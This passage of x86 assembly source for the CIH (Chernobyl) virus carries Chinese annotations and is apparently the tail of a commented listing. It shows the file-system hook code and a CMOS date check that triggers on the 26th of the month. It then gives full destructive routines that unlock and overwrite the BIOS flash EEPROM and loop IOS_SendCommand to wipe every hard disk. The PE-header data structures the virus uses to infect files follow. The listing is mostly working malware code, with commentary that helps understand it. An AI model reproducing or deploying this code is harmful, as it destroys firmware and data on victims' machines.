; ************************************* prevhook: popad ;恢復所有寄存器 mov eax, dr0 ; 保存的原來的文件系統鉤子程序首址 jmp [eax] ; Jump to prevhook ;跳到前一個鉤子去執行 ; *************************************
; * Call the Function that the IFS *
; * Manager Would Normally Call to *
; * Implement this Particular I/O *
; * Request. *
; ************************************* pIFSFunc: ; FileSystemApiHookFunction的參數見助標2mov ebx, esp ; ebx指向esp以獲得FileSystemApiHookFunction的參數地址push dword ptr [ebx+20h+04h+14h] ; Push pioreq ;把參數pioreq pir壓棧(ebx+20h+04h為參數首址) call [ebx+20h+04h] ; Call pIFSFunc ;調用pIFSFunc FSDFnAddr(FSD的功能地址) pop ecx ; mov [ebx+1ch], eax ; Modify EAX Value in Stack ;改eax的值(在棧中,20h為pushad的壓棧大小,1ch為第一個壓棧的eax) ; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the *
; * Returned pioreq. *
; *************************** cmp dword ptr [ebx+20h+04h+04h], 00000024h ;詳見助標2 jne QuitMyVirusFileSystemHook ; *****************
; * Get the File *
; * Modification *
; * Date and Time *
; * in DOS Format.*
; ***************** mov eax, [ecx+28h] mov (FileModificationTime-@6)[esi], eax ;保存獲得的文件時間和日期 ; ***************************
; * Quit My Virus' *
; * IFSMgr_FileSystemHook *
; *************************** QuitMyVirusFileSystemHook: popad ;恢復所有寄存器 ret ;從病毒設置的文件鉤子程序中退出 ; *************************************
; * Kill Computer !? ... *^_^* * ;KillComputer模塊(!!十分危險,所以原理分析及詳細注釋暫不公布!!)
; ************************************* IsKillComputer: ; Get Now Day from BIOS CMOS mov al, 07h out 70h, al in al, 71h xor al, 26h ; ??/26/???? ;從CMOS中獲得當前的日期 IF DEBUG jmp DisableOnBusy
ELSE jnz DisableOnBusy
ENDIF ;如果是每月的26號就KillComputer(太危險了).*^_^*.; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; ************************************** ; ***************************
; * Kill BIOS EEPROM *
; *************************** mov bp, 0cf8h lea esi, IOForEEPROM-@7[esi] ; ***********************
; * Show BIOS Page in *
; * 000E0000 - 000EFFFF *
; * ( 64 KB ) *
; *********************** mov edi, 8000384ch mov dx, 0cfeh cli call esi ; ***********************
; * Show BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; *********************** mov di, 0058h dec edx ; and a0fh mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h call esi ; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E01FF *
; * ( 512 Bytes ) *
; * , and the Section *
; * of Extra BIOS can *
; * be Writted... *
; *********************** lea ebx, EnableEEPROMToWrite-@10[esi] mov eax, 0e5555h mov ecx, 0e2aaah call ebx mov byte ptr [eax], 60h push ecx loop $ ; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory *
; * 000E0000 - 000E007F *
; * ( 80h Bytes ) *
; *********************** xor ah, ah mov [eax], al xchg ecx, eax loop $ ; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data *
; * 000E0000 - 000FFFFF *
; * ( 128 KB ) *
; * can be Writted... *
; *********************** mov eax, 0f5555h pop ecx mov ch, 0aah call ebx mov byte ptr [eax], 20h loop $ ; ***********************
; * Kill the BIOS Main *
; * ROM Data in Memory *
; * 000FE000 - 000FE07F *
; * ( 80h Bytes ) *
; *********************** mov ah, 0e0h mov [eax], al ; ***********************
; * Hide BIOS Page in *
; * 000F0000 - 000FFFFF *
; * ( 64 KB ) *
; *********************** ; or al 0h mov word ptr (BooleanCalculateCode-@10)[esi], 100ch call esi ; ***************************
; * Kill All HardDisk *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; *************************************************** KillHardDisk: xor ebx, ebx mov bh, FirstKillHardDiskNumber push ebx sub esp, 2ch push 0c0001000h mov bh, 08h push ebx push ecx push ecx push ecx push 40000501h inc ecx push ecx push ecx mov esi, esp sub esp, 0ach LoopOfKillHardDisk: int 20h dd 00100004h ; VXDCall IOS_SendCommand cmp word ptr [esi+06h], 0017h je KillNextDataSection ChangeNextHardDisk: inc byte ptr [esi+4dh] jmp LoopOfKillHardDisk KillNextDataSection: add dword ptr [esi+10h], ebx mov byte ptr [esi+4dh], FirstKillHardDiskNumber jmp LoopOfKillHardDisk ; ***************************
; * Enable EEPROM to Write *
; *************************** EnableEEPROMToWrite: mov [eax], cl mov [ecx], al mov byte ptr [eax], 80h mov [eax], cl mov [ecx], al ret ; ***************************
; * IO for EEPROM *
; *************************** IOForEEPROM:
@10 = IOForEEPROM xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp in al, dx BooleanCalculateCode = $ or al, 44h xchg eax, edi xchg edx, ebp out dx, eax xchg eax, edi xchg edx, ebp out dx, al ret ; *********************************************************
; * Static Data *
; ********************************************************* LastVxDCallAddress = IFSMgr_Ring0_FileIO ;最后一個調用的VxD的指令的地址
VxDCallAddressTable db 00h db IFSMgr_RemoveFileSystemApiHook-_PageAllocate db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook db IFSMgr_Ring0_FileIO-UniToBCSPath ;各個VxD調用指令地址之差 VxDCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;VxD的調用號
VxDCallTableSize = ($-VxDCallIDTable)/04h ;程序中使用VxD調用的個數 ; *********************************************************
; * Virus Version Copyright *
; ********************************************************* VirusVersionCopyright db 'CIH v' ;CIH病毒的標識 db MajorVirusVersion+'0' ;主版本號 db '.' db MinorVirusVersion+'0' ;副版本號 db ' TATUNG' ;作者名字 ; *********************************************************
; * Virus Size *
; ********************************************************* VirusSize = $
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h) ;病毒代碼全長 ; *********************************************************
; * Dynamic Data *
; ********************************************************* VirusGameDataStartAddress = VirusSize
@6 = VirusGameDataStartAddress
OnBusy db 0 ;忙標志
FileModificationTime dd ? ;文件修改時間 FileNameBuffer db FileNameBufferSize dup(?) ;7fh長的文件名數據區
@7 = FileNameBuffer DataBuffer = $
@8 = DataBuffer
NumberOfSections dw ? ; 塊數目
TimeDateStamp dd ? ; 文件時間
SymbolsPointer dd ? ;
NumberOfSymbols dd ? ; 符號表中符號個數
SizeOfOptionalHeader dw ? ; 可選部首長度
_Characteristics dw ? ; 信息標志
Magic dw ? ; 標志字(總是010bh)
LinkerVersion dw ? ; 連接器版本號
SizeOfCode dd ? ; 代碼段大小
SizeOfInitializedData dd ? ; 已初始化數據塊大小
SizeOfUninitializedData dd ? ; 未初始化數據塊大小
AddressOfEntryPoint dd ? ; 程序起始RVA
BaseOfCode dd ? ; 代碼段起始RVA
BaseOfData dd ? ; 數據段起始RVA
ImageBase dd ? ; 裝入基址RVA
@9 = $
SectionAlignment dd ? ; 塊對齊
FileAlignment dd ? ; 文件塊對齊
OperatingSystemVersion dd ? ; 所需操作系統版本號
ImageVersion dd ? ; 用戶自定義版本號
SubsystemVersion dd ? ; 所需子系統版本號
Reserved dd ? ; 保留
SizeOfImage dd ? ; 文件各部分總長
SizeOfHeaders dd ? ; 部首及塊表大小
SizeOfImageHeaderToRead = $-NumberOfSections ; ;
NewAddressOfEntryPoint = DataBuffer ; DWORD ;
SizeOfImageHeaderToWrite = 04h ; StartOfSectionTable = @9
SectionName = StartOfSectionTable ; QWORD ; 塊名
VirtualSize = StartOfSectionTable+08h ; DWORD ; 該段真實長度
VirtualAddress = StartOfSectionTable+0ch ; DWORD ; 該塊的RVA
SizeOfRawData = StartOfSectionTable+10h ; DWORD ; 該塊物理長度
PointerToRawData = StartOfSectionTable+14h ; DWORD ; 該塊物理偏移
PointerToRelocations = StartOfSectionTable+18h ; DWORD ; 重定位的偏移
PointerToLineNumbers = StartOfSectionTable+1ch ; DWORD ; 行號表的偏移
NumberOfRelocations = StartOfSectionTable+20h ; WORD ; 重定位項數目
NumberOfLinenNmbers = StartOfSectionTable+22h ; WORD ; 行號表的數目
Characteristics = StartOfSectionTable+24h ; DWORD ; 塊屬性
SizeOfScetionTable = Characteristics+04h-SectionName ; 塊表項的長度 ; *********************************************************
; * Virus Total Need Memory *
; ********************************************************* VirusNeedBaseMemory = $ VirusNeedBaseMemory = $ VirusTotalNeedMemory = @9
; + NumberOfSections(??)*SizeOfScetionTable(28h)
; + SizeOfVirusCodeSectionTableEndMark(04h)
; + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
; + SizeOfTheFirstVirusCodeSectionTable(04h) ;病毒所需的內存(病毒全長) ; *********************************************************
; ********************************************************* VirusGame ENDS END FileHeader ;病毒全文完